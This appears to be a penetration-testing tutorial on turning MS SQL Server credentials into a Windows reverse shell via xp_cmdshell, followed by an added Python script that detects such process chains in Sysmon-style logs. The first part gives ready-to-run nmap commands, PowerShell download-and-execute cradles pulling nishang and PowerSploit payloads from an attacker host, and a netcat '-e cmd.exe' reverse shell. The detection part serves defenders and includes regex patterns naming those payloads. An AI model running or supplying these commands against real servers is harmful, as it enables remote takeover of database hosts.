How to get a xp_cmdshell reverse shell in a Windows Server
In a pentesting engagement, if you have obtained credentials for the MS SQL Server, you can easily execute any command on the database server with the nmap NSE script ms-sql-xp-cmdshell.
In the following example we execute the whoami command on the MS SQL Windows server:
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="whoami" $IP
Substitute the following parameters in the above command:
mssql.username: Database username (sa in the example)
mssql.password: Database password (sa in the example)
ms-sql-xp-cmdshell.cmd: Command to execute (whoami in the example)
If you want a reverse shell that connects back to your machine, you can use any of the Windows PowerShell post-exploitation frameworks shown below.
xp_cmdshell with nishang
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/winpost/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 443"
xp_cmdshell with Powersploit
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP:8000/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $LOCALIP -Lport 4444 -Force"
xp_cmdshell with nc
First we need to download nc to the target machine from our machine:
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="powershell.exe wget -OutFile c:\\Users\\Public\\nc.exe"
Now we can execute the reverse shell:
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="c:\\Users\\Public\\nc.exe -e cmd.exe 4444"
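The same chain seen from the defending side, as an added example that is not part of the original post: xp_cmdshell hands its command to cmd.exe as a child of the SQL Server service process, so in process-creation telemetry the cmd.exe, and then the powershell.exe or nc.exe it launches, all descend from sqlservr.exe. The script below assumes Sysmon Event ID 1-style fields (Image, ParentImage, ProcessGuid, ParentProcessGuid, CommandLine), walks that ancestry, and matches the command-line patterns of the payloads shown above. The log records, hosts and paths are constructed for the example.

```python
"""Flag xp_cmdshell-style process chains in process-creation telemetry.

Added example for this page (not code from the original post). The records
below are constructed, Sysmon Event ID 1-shaped dictionaries; the IP address
and file paths in them are made up.
"""
import json
import re
from dataclasses import asdict, dataclass, field

# Command-line indicators derived from the payload styles shown on the page.
INDICATORS = {
    "download_cradle": re.compile(r"DownloadString\s*\(|IEX\s*\(|Invoke-Expression", re.I),
    "exec_policy_bypass": re.compile(r"-exec(utionpolicy)?\s+bypass", re.I),
    "powershell_download": re.compile(r"\b(wget|curl|Invoke-WebRequest|iwr)\b.*-OutFile", re.I),
    "netcat_shell": re.compile(r"\bnc(64)?\.exe\b.*\s-e\s", re.I),
}

# Constructed sample events. ProcessGuid/ParentProcessGuid link the chain the
# way Sysmon does; the sqlservr.exe record itself is deliberately absent so
# the fallback to ParentImage is exercised.
SAMPLE_EVENTS = [
    {"RecordId": 1, "ProcessGuid": "g-cmd", "ParentProcessGuid": "g-sql",
     "ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": '"cmd.exe" /c whoami'},
    {"RecordId": 2, "ProcessGuid": "g-ps1", "ParentProcessGuid": "g-cmd",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -exec bypass -Command \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.5/x.ps1')\""},
    {"RecordId": 3, "ProcessGuid": "g-ps2", "ParentProcessGuid": "g-cmd",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe wget -OutFile c:\Users\Public\nc.exe"},
    {"RecordId": 4, "ProcessGuid": "g-nc", "ParentProcessGuid": "g-cmd",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Users\Public\nc.exe",
     "CommandLine": r"c:\Users\Public\nc.exe -e cmd.exe 203.0.113.5 4444"},
    # Benign: a service host running cmd.exe must not fire.
    {"RecordId": 5, "ProcessGuid": "g-ok", "ParentProcessGuid": "g-svc",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": '"cmd.exe" /c dir'},
]


@dataclass
class Finding:
    record_id: int
    severity: str
    reason: str
    indicators: list = field(default_factory=list)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(rec, by_guid, max_hops=5):
    """Image names from this process up its parent chain.

    Follows ParentProcessGuid while the parent record is in the batch; when it
    is not, falls back to the ParentImage field of the last record and stops.
    """
    chain = [basename(rec["Image"])]
    cur = rec
    for _ in range(max_hops):
        parent = by_guid.get(cur.get("ParentProcessGuid"))
        if parent is None:
            chain.append(basename(cur.get("ParentImage", "")))
            break
        chain.append(basename(parent["Image"]))
        cur = parent
    return chain


def analyze(records):
    """Return findings: anything descending from sqlservr.exe is high severity;
    indicator-only matches elsewhere are medium."""
    by_guid = {r["ProcessGuid"]: r for r in records}
    findings = []
    for rec in records:
        chain = ancestry(rec, by_guid)
        hits = [name for name, rx in INDICATORS.items() if rx.search(rec.get("CommandLine", ""))]
        if "sqlservr.exe" in chain[1:]:
            findings.append(Finding(rec["RecordId"], "high",
                                    "descends from sqlservr.exe: " + " <- ".join(chain), hits))
        elif hits:
            findings.append(Finding(rec["RecordId"], "medium", "suspicious command line", hits))
    return findings


def report(findings) -> str:
    """JSON document suitable for forwarding to a SIEM."""
    return json.dumps([asdict(f) for f in findings], indent=2)


if __name__ == "__main__":
    print(report(analyze(SAMPLE_EVENTS)))
```

The ancestry walk matters because the interesting process is usually two hops down: the direct child of sqlservr.exe is cmd.exe, and the PowerShell cradle or nc.exe sits under that. xp_cmdshell is disabled by default and enabling it through sp_configure needs sysadmin-level rights, so an alert like this pairs naturally with a SQL Server audit of configuration changes and of sa logins from unexpected hosts.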